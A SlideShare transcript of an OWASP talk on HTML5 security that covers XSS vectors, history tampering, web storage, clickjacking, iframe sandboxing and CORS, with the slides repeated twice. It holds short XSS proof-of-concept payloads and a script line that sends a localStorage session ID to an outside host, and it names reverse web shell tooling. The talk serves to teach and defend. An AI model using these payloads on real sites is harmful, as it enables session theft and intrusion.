SlideShare a Scribd company logo

Html5 security

Download as PPTX, PDF
Krishna T
Krishna T

The document discusses security considerations for HTML5. It notes that while HTML5 specifications are not inherently flawed, bad code can introduce new vulnerabilities. It outlines several attack vectors like XSS, history tampering, web storage manipulation, and clickjacking. It also discusses mitigations like script isolation, cross-document messaging, sandboxing, and CORS, noting their limitations. The document aims to raise awareness of the expanded client-side attack surface in HTML5.

Related slideshows

Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)
 
Dom based xss
Dom based xssDom based xss
Dom based xss
 
Web browser privacy and security
Web browser privacy and security Web browser privacy and security
Web browser privacy and security
 
1 of 34
The OWASP Foundation http://www.owasp.org Krishna Chaitanya T www.novogeek.com Security
HTML5-Quick Intro • 5th revision of the HTML standard. • It’s not one big thing. • Set of features, technologies & APIs • Responsive, interactive, stunning, secure • Don’t need to throw anything away. • It already works and here to stay! |2
HTML5-Features • New structural & semantic tags • Several new elements & attributes • Multimedia and Graphics • Client side storage, drag/drop, • Web messaging, CORS, web sockets • and a ton! http://slides.html5rocks.com 3
What about security? • HTML5 is designed with great effort on security! • Specs by themselves aren’t seriously flawed • Bad code means nest of new vulnerabilities! • Brings several complex attack scenarios! • Increases client side attack surface 4
Anything problematic? • Hijacking forms made easy • Stealing focus & key strokes • Form/History Tampering • UI redressing vectors • Cross origin Attacks • and many more.. 5
Few new attack vectors • XSS via formaction // User interaction required <form id="test" /><button form="test" formaction="javascript:alert(1)"> • Self-executing focus event via autofocus //No user interaction required <input onfocus=“write(1)” autofocus> • JavaScript execution via <VIDEO> and <SOURCE> tag <video><source onerror="javascript:alert(1)"> • Form surveillance <form id=test onforminput=alert(1)><input></form> <button form=test onformchange=alert(2)> 6
History tampering • Then - history.go(), .forward(), .back() • Now – history.pushState(data, title, [url]) history.replaceState(data, title, [url]) • Overflowing user’s history for(i=0;i<50;i++){ history.pushState({}, "", “/youAreTrapped.html"); } • URL spoofing • Redirection to infected sites 7
Web Storage • Solves the restriction of cookies (size, transport during requests etc.) • 2 types-Local storage & Session storage • Persistent-No expiry unlike cookies. • ~5MB storage space per domain • Isolation of storage objects is based on origin 8
Web storage-threat • Any XSS flaw in the website can read, write and tamper stored data! <script> document.write("<img src='http://a.com?sessionID="+localStorage.getItem('SessionID')+"'>"); </script> • “If you claim that "XSS is not a big deal" that means you never owned something by using it and that's your problem not XSS's”-Ferruh Mavituna, Author of XSS Shell 9
Origin-The foundation • Every talk on security of web platform should mention about “Origin”! • Basic unit of isolation in the web platform • Origin = scheme://host:port • Ex: http://bing.com, http://localhost:81/, https://icicibank.com 10
Same-Origin-Policy • Browsers allow one object to access another if both are from “same origin” (any exceptions?) • Privileges within origin • Full network access • Read/Write access to DOM • Storage “SOP-Prevents useful things. Allows dangerous things”- Douglas Crockford 11
12
Script Isolation • Restricting JavaScript to a subset • Object-capability security model • Idea: If an object in JavaScript has no reference to “XMLHttpRequest” object, an AJAX call cannot be made. • Popular JavaScript subsets: •Caja (iGoogle), FBJS (Facebook), ADSafe (Yahoo) • Learning curve, usability issues 13
Isolation with Frames • Separate security context for each origin • Less interactive than JS approach • Comply with SOP • Beware! Frames can be navigated to different origins using JavaScript! • Frame navigation is NOT the same as SOP! 14
Frame Navigation Policies Permissive Window Descendant Child 15
HTML5 Cross Document Messaging • Cross-origin client side communication • Network-like channel between frames • Securely abstracts multiple principals • Frames can integrate widgets (in mashups) with improved trust! 16
Messaging API-Beware of origin & framing! //Posting message to a cross domain partner. frames[0].postMessage(“Hello Partner!”, "http://localhost:81/"); //Retrieving message from the sender window.onmessage = function (e) { if (e.origin == 'http://localhost') { //sanitize and accept data } }; 17
Demo Cross Domain Messaging- Recursive Mashup Attack
AJAX, Cross Document Messaging & CORS AJAX Messaging CORS 19
Clickjacking! 20
JS Defense - Frame Busting if (top != self) { //condition top.location = self.location; //counter action } 21
Demo Clickjacking with CSS & JS
HTML5 Iframe Sandbox • Very important security feature! • “sandbox” attribute disables form submissions, scripts, top window navigation, popups etc. <iframe sandbox src="http://remoteSite.com"></iframe> • Can be relaxed with few tokens <iframe sandbox=“allow-forms allow-scripts allow-same-origin allow- top-navigation” src="http://remoteSite.com"></iframe> 23
Sandbox-problems • Disables JS based frame busting defense • Allow-scripts and allow-same-origin should not be used together when embedded page has same origin as the page containing iframe! • The above combination enables script to remove sandbox attribute altogether! 24
Demo a) Sandbox disabling frame busters b) Allow-same-origin, allow-scripts combination
HTML5 Drag/Drop • Enhances User Experience • Allows text injection into remote sites • draggable=“true”, “ondragstart” event can be used to drag malicious code into remote iframes! <div draggable="true" ondragstart="event.dataTransfer.setData('text/plain','malicious code');"> <h1>Drop me</h1> </div> <iframe src="http://www.example.org/dropHere.html"></iframe> 26
Demo “Alphabet-Hero” built by @kkotowicz http://attacker.kotowicz.net/alphabet-hero/game.html
CORS • Allows Cross-Origin calls (which are not possible with AJAX) by careful restrictions. • “Access-Control-Allow-Origin” response header must be defined by remote site. • Simple COR for GET, POST, HEAD methods. • COR with preflight requests for PUT, DELETE • Wild card operator “*” 28
CORS-Threats • Shared hosting sites should be careful! http://A.com/user1 and http://A.com/user2 belong to the same origin • Accessing internal servers • Scanning internal network • Establishing a remote shell • Rogue CORs and DDoS attacks • Misplaced Trust 29
SOTF-Reverse Web Shell Hijacked sessions are available to the attacker Malicious JavaScript injected via XSS hole 30
CORS-Accessing intranet apps Image: Compass Security 31
Demo a) “Shell of the future” built by @lavakumark http://www.andlabs.org/tools/sotf/sotf.html b) Accessing internal servers
Questions? www.novogeek.com Twitter: @novogeek 33
References • Stanford Security Research Lab: http://seclab.stanford.edu/websec/ • Dive into HTML5: http://diveintohtml5.info • HTML5 Security cheatsheet: http://heideri.ch/jso/ • HTML5 Security: http://html5security.org • Compass Security • LavaKumar Kuppan: http://blog.andlabs.org/ • Kotowicz: http://blog.kotowicz.net 34

More Related Content

Html5 security

  • 1. The OWASP Foundation http://www.owasp.org Krishna Chaitanya T www.novogeek.com Security
  • 2. HTML5-Quick Intro • 5th revision of the HTML standard. • It’s not one big thing. • Set of features, technologies & APIs • Responsive, interactive, stunning, secure • Don’t need to throw anything away. • It already works and here to stay! |2
  • 3. HTML5-Features • New structural & semantic tags • Several new elements & attributes • Multimedia and Graphics • Client side storage, drag/drop, • Web messaging, CORS, web sockets • and a ton! http://slides.html5rocks.com 3
  • 4. What about security? • HTML5 is designed with great effort on security! • Specs by themselves aren’t seriously flawed • Bad code means nest of new vulnerabilities! • Brings several complex attack scenarios! • Increases client side attack surface 4
  • 5. Anything problematic? • Hijacking forms made easy • Stealing focus & key strokes • Form/History Tampering • UI redressing vectors • Cross origin Attacks • and many more.. 5
  • 6. Few new attack vectors • XSS via formaction // User interaction required <form id="test" /><button form="test" formaction="javascript:alert(1)"> • Self-executing focus event via autofocus //No user interaction required <input onfocus=“write(1)” autofocus> • JavaScript execution via <VIDEO> and <SOURCE> tag <video><source onerror="javascript:alert(1)"> • Form surveillance <form id=test onforminput=alert(1)><input></form> <button form=test onformchange=alert(2)> 6
  • 7. History tampering • Then - history.go(), .forward(), .back() • Now – history.pushState(data, title, [url]) history.replaceState(data, title, [url]) • Overflowing user’s history for(i=0;i<50;i++){ history.pushState({}, "", “/youAreTrapped.html"); } • URL spoofing • Redirection to infected sites 7
  • 8. Web Storage • Solves the restriction of cookies (size, transport during requests etc.) • 2 types-Local storage & Session storage • Persistent-No expiry unlike cookies. • ~5MB storage space per domain • Isolation of storage objects is based on origin 8
  • 9. Web storage-threat • Any XSS flaw in the website can read, write and tamper stored data! <script> document.write("<img src='http://a.com?sessionID="+localStorage.getItem('SessionID')+"'>"); </script> • “If you claim that "XSS is not a big deal" that means you never owned something by using it and that's your problem not XSS's”-Ferruh Mavituna, Author of XSS Shell 9
  • 10. Origin-The foundation • Every talk on security of web platform should mention about “Origin”! • Basic unit of isolation in the web platform • Origin = scheme://host:port • Ex: http://bing.com, http://localhost:81/, https://icicibank.com 10
  • 11. Same-Origin-Policy • Browsers allow one object to access another if both are from “same origin” (any exceptions?) • Privileges within origin • Full network access • Read/Write access to DOM • Storage “SOP-Prevents useful things. Allows dangerous things”- Douglas Crockford 11
  • 12. 12
  • 13. Script Isolation • Restricting JavaScript to a subset • Object-capability security model • Idea: If an object in JavaScript has no reference to “XMLHttpRequest” object, an AJAX call cannot be made. • Popular JavaScript subsets: •Caja (iGoogle), FBJS (Facebook), ADSafe (Yahoo) • Learning curve, usability issues 13
  • 14. Isolation with Frames • Separate security context for each origin • Less interactive than JS approach • Comply with SOP • Beware! Frames can be navigated to different origins using JavaScript! • Frame navigation is NOT the same as SOP! 14
  • 16. HTML5 Cross Document Messaging • Cross-origin client side communication • Network-like channel between frames • Securely abstracts multiple principals • Frames can integrate widgets (in mashups) with improved trust! 16
  • 17. Messaging API-Beware of origin & framing! //Posting message to a cross domain partner. frames[0].postMessage(“Hello Partner!”, "http://localhost:81/"); //Retrieving message from the sender window.onmessage = function (e) { if (e.origin == 'http://localhost') { //sanitize and accept data } }; 17
  • 19. AJAX, Cross Document Messaging & CORS AJAX Messaging CORS 19
  • 21. JS Defense - Frame Busting if (top != self) { //condition top.location = self.location; //counter action } 21
  • 23. HTML5 Iframe Sandbox • Very important security feature! • “sandbox” attribute disables form submissions, scripts, top window navigation, popups etc. <iframe sandbox src="http://remoteSite.com"></iframe> • Can be relaxed with few tokens <iframe sandbox=“allow-forms allow-scripts allow-same-origin allow- top-navigation” src="http://remoteSite.com"></iframe> 23
  • 24. Sandbox-problems • Disables JS based frame busting defense • Allow-scripts and allow-same-origin should not be used together when embedded page has same origin as the page containing iframe! • The above combination enables script to remove sandbox attribute altogether! 24
  • 25. Demo a) Sandbox disabling frame busters b) Allow-same-origin, allow-scripts combination
  • 26. HTML5 Drag/Drop • Enhances User Experience • Allows text injection into remote sites • draggable=“true”, “ondragstart” event can be used to drag malicious code into remote iframes! <div draggable="true" ondragstart="event.dataTransfer.setData('text/plain','malicious code');"> <h1>Drop me</h1> </div> <iframe src="http://www.example.org/dropHere.html"></iframe> 26
  • 27. Demo “Alphabet-Hero” built by @kkotowicz http://attacker.kotowicz.net/alphabet-hero/game.html
  • 28. CORS • Allows Cross-Origin calls (which are not possible with AJAX) by careful restrictions. • “Access-Control-Allow-Origin” response header must be defined by remote site. • Simple COR for GET, POST, HEAD methods. • COR with preflight requests for PUT, DELETE • Wild card operator “*” 28
  • 29. CORS-Threats • Shared hosting sites should be careful! http://A.com/user1 and http://A.com/user2 belong to the same origin • Accessing internal servers • Scanning internal network • Establishing a remote shell • Rogue CORs and DDoS attacks • Misplaced Trust 29
  • 30. SOTF-Reverse Web Shell Hijacked sessions are available to the attacker Malicious JavaScript injected via XSS hole 30
  • 31. CORS-Accessing intranet apps Image: Compass Security 31
  • 32. Demo a) “Shell of the future” built by @lavakumark http://www.andlabs.org/tools/sotf/sotf.html b) Accessing internal servers
  • 33. Questions? www.novogeek.com Twitter: @novogeek 33
  • 34. References • Stanford Security Research Lab: http://seclab.stanford.edu/websec/ • Dive into HTML5: http://diveintohtml5.info • HTML5 Security cheatsheet: http://heideri.ch/jso/ • HTML5 Security: http://html5security.org • Compass Security • LavaKumar Kuppan: http://blog.andlabs.org/ • Kotowicz: http://blog.kotowicz.net 34